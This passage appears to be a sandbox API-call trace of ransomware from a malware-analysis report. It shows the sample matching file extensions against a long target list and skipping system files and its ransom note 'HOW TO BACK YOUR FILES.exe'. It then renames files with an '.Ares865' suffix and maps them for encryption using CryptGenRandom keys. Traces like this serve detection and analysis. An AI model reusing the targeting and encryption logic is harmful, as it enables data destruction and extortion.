(lpString1="dll", lpString2="dbc") returned 1 [0086.403] lstrlenW (lpString="dbs") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.403] lstrlenW (lpString="dbt") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.403] lstrlenW (lpString="dbv") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.403] lstrlenW (lpString="dbx") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.403] lstrlenW (lpString="dcb") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.403] lstrlenW (lpString="dct") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.403] lstrlenW (lpString="dcx") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.403] lstrlenW (lpString="ddl") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.403] lstrlenW (lpString="dlis") returned 4 [0086.403] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.403] lstrlenW (lpString="dp1") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.403] lstrlenW (lpString="dqy") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.403] lstrlenW (lpString="dsk") returned 3 [0086.403] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.403] lstrlenW (lpString="dsn") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.404] lstrlenW (lpString="dtsx") returned 4 [0086.404] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.404] lstrlenW (lpString="dxl") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.404] lstrlenW (lpString="eco") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.404] lstrlenW (lpString="ecx") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.404] lstrlenW (lpString="edb") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.404] lstrlenW (lpString="epim") returned 4 [0086.404] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.404] lstrlenW (lpString="fcd") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.404] lstrlenW (lpString="fdb") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.404] lstrlenW (lpString="fic") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.404] lstrlenW (lpString="flexolibrary") returned 12 [0086.404] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.404] lstrlenW (lpString="fm5") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.404] lstrlenW (lpString="fmp") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.404] lstrlenW (lpString="fmp12") returned 5 [0086.404] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.404] lstrlenW (lpString="fmpsl") returned 5 [0086.404] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.404] lstrlenW (lpString="fol") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.404] lstrlenW (lpString="fp3") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.404] lstrlenW (lpString="fp4") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.404] lstrlenW (lpString="fp5") returned 3 [0086.404] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.404] lstrlenW (lpString="fp7") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.405] lstrlenW (lpString="fpt") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.405] lstrlenW (lpString="frm") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.405] lstrlenW (lpString="gdb") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.405] lstrlenW (lpString="gdb") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.405] lstrlenW (lpString="grdb") returned 4 [0086.405] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.405] lstrlenW (lpString="gwi") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.405] lstrlenW (lpString="hdb") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.405] lstrlenW (lpString="his") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.405] lstrlenW (lpString="ib") returned 2 [0086.405] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.405] lstrlenW (lpString="idb") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.405] lstrlenW (lpString="ihx") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.405] lstrlenW (lpString="itdb") returned 4 [0086.405] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.405] lstrlenW (lpString="itw") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.405] lstrlenW (lpString="jet") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.405] lstrlenW (lpString="jtx") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.405] lstrlenW (lpString="kdb") returned 3 [0086.405] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.405] lstrlenW (lpString="kexi") returned 4 [0086.405] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.405] lstrlenW (lpString="kexic") returned 5 [0086.405] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.405] lstrlenW (lpString="kexis") returned 5 [0086.406] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.406] lstrlenW (lpString="lgc") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.406] lstrlenW (lpString="lwx") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.406] lstrlenW (lpString="maf") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.406] lstrlenW (lpString="maq") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.406] lstrlenW (lpString="mar") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.406] lstrlenW (lpString="marshal") returned 7 [0086.406] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.406] lstrlenW (lpString="mas") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.406] lstrlenW (lpString="mav") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.406] lstrlenW (lpString="maw") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.406] lstrlenW (lpString="mdbhtml") returned 7 [0086.406] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.406] lstrlenW (lpString="mdn") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.406] lstrlenW (lpString="mdt") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.406] lstrlenW (lpString="mfd") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.406] lstrlenW (lpString="mpd") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.406] lstrlenW (lpString="mrg") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.406] lstrlenW (lpString="mud") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.406] lstrlenW (lpString="mwb") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.406] lstrlenW (lpString="myd") returned 3 [0086.406] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.407] lstrlenW (lpString="ndf") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.407] lstrlenW (lpString="nnt") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.407] lstrlenW (lpString="nrmlib") returned 6 [0086.407] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.407] lstrlenW (lpString="ns2") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.407] lstrlenW (lpString="ns3") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.407] lstrlenW (lpString="ns4") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.407] lstrlenW (lpString="nsf") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.407] lstrlenW (lpString="nv") returned 2 [0086.407] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.407] lstrlenW (lpString="nv2") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.407] lstrlenW (lpString="nwdb") returned 4 [0086.407] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.407] lstrlenW (lpString="nyf") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.407] lstrlenW (lpString="odb") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.407] lstrlenW (lpString="odb") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.407] lstrlenW (lpString="oqy") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.407] lstrlenW (lpString="ora") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.407] lstrlenW (lpString="orx") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.407] lstrlenW (lpString="owc") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.407] lstrlenW (lpString="p96") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.407] lstrlenW (lpString="p97") returned 3 [0086.407] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.408] lstrlenW (lpString="pan") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.408] lstrlenW (lpString="pdb") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.408] lstrlenW (lpString="pdm") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.408] lstrlenW (lpString="pnz") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.408] lstrlenW (lpString="qry") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.408] lstrlenW (lpString="qvd") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.408] lstrlenW (lpString="rbf") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.408] lstrlenW (lpString="rctd") returned 4 [0086.408] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.408] lstrlenW (lpString="rod") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.408] lstrlenW (lpString="rodx") returned 4 [0086.408] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.408] lstrlenW (lpString="rpd") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.408] lstrlenW (lpString="rsd") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.408] lstrlenW (lpString="sas7bdat") returned 8 [0086.408] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.408] lstrlenW (lpString="sbf") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.408] lstrlenW (lpString="scx") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.408] lstrlenW (lpString="sdb") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.408] lstrlenW (lpString="sdc") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.408] lstrlenW (lpString="sdf") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.408] lstrlenW (lpString="sis") returned 3 [0086.408] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.408] lstrlenW (lpString="spq") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.409] lstrlenW (lpString="te") returned 2 [0086.409] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.409] lstrlenW (lpString="teacher") returned 7 [0086.409] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.409] lstrlenW (lpString="tmd") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.409] lstrlenW (lpString="tps") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.409] lstrlenW (lpString="trc") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.409] lstrlenW (lpString="trc") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.409] lstrlenW (lpString="trm") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.409] lstrlenW (lpString="udb") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.409] lstrlenW (lpString="udl") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.409] lstrlenW (lpString="usr") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.409] lstrlenW (lpString="v12") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.409] lstrlenW (lpString="vis") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.409] lstrlenW (lpString="vpd") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.409] lstrlenW (lpString="vvv") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.409] lstrlenW (lpString="wdb") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.409] lstrlenW (lpString="wmdb") returned 4 [0086.409] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.409] lstrlenW (lpString="wrk") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.409] lstrlenW (lpString="xdb") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.409] lstrlenW (lpString="xld") returned 3 [0086.409] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.410] lstrlenW (lpString="xmlff") returned 5 [0086.410] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.Ares865") returned 81 [0086.410] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.412] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.412] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=652640) returned 1 [0086.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.412] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.412] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.413] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9f860, lpName=0x0) returned 0x15c [0086.417] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9f860) returned 0xdd0000 [0086.448] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.448] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.448] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.449] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.451] UnmapViewOfFile (lpBaseAddress=0xdd0000) returned 1 [0086.456] CloseHandle (hObject=0x15c) returned 1 [0086.456] CloseHandle (hObject=0x118) returned 1 [0086.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.459] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="..") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="windows") returned -1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="temp") returned -1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="boot") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="perflogs") returned -1 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.460] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0086.460] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0086.460] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLWVW.DLL.trx_dll" | out: lpString1="OUTLWVW.DLL.trx_dll") returned="OUTLWVW.DLL.trx_dll" [0086.460] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0086.460] lstrlenW (lpString="Ares865") returned 7 [0086.460] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.460] lstrlenW (lpString=".dll") returned 4 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".dll") returned 1 [0086.460] lstrlenW (lpString=".lnk") returned 4 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.460] lstrlenW (lpString=".ini") returned 4 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".ini") returned 1 [0086.460] lstrlenW (lpString=".sys") returned 4 [0086.460] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".sys") returned 1 [0086.460] lstrlenW (lpString="OUTLWVW.DLL.trx_dll") returned 19 [0086.460] lstrlenW (lpString="bak") returned 3 [0086.460] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.460] lstrlenW (lpString="ba_") returned 3 [0086.460] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.460] lstrlenW (lpString="dbb") returned 3 [0086.460] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.460] lstrlenW (lpString="vmdk") returned 4 [0086.460] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.460] lstrlenW (lpString="rar") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.461] lstrlenW (lpString="zip") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.461] lstrlenW (lpString="tgz") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.461] lstrlenW (lpString="vbox") returned 4 [0086.461] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.461] lstrlenW (lpString="vdi") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.461] lstrlenW (lpString="vhd") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.461] lstrlenW (lpString="vhdx") returned 4 [0086.461] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.461] lstrlenW (lpString="avhd") returned 4 [0086.461] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.461] lstrlenW (lpString="db") returned 2 [0086.461] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.461] lstrlenW (lpString="db2") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.461] lstrlenW (lpString="db3") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.461] lstrlenW (lpString="dbf") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.461] lstrlenW (lpString="mdf") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.461] lstrlenW (lpString="mdb") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.461] lstrlenW (lpString="sql") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.461] lstrlenW (lpString="sqlite") returned 6 [0086.461] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.461] lstrlenW (lpString="sqlite3") returned 7 [0086.461] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.461] lstrlenW (lpString="sqlitedb") returned 8 [0086.461] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.461] lstrlenW (lpString="xml") returned 3 [0086.461] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.461] lstrlenW (lpString="$er") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.462] lstrlenW (lpString="4dd") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.462] lstrlenW (lpString="4dl") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.462] lstrlenW (lpString="^^^") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.462] lstrlenW (lpString="abs") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.462] lstrlenW (lpString="abx") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.462] lstrlenW (lpString="accdb") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.462] lstrlenW (lpString="accdc") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.462] lstrlenW (lpString="accde") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.462] lstrlenW (lpString="accdr") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.462] lstrlenW (lpString="accdt") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.462] lstrlenW (lpString="accdw") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.462] lstrlenW (lpString="accft") returned 5 [0086.462] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.462] lstrlenW (lpString="adb") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.462] lstrlenW (lpString="adb") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.462] lstrlenW (lpString="ade") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.462] lstrlenW (lpString="adf") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.462] lstrlenW (lpString="adn") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.462] lstrlenW (lpString="adp") returned 3 [0086.462] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.463] lstrlenW (lpString="alf") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.463] lstrlenW (lpString="ask") returned 3 [0086.463] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.463] lstrlenW 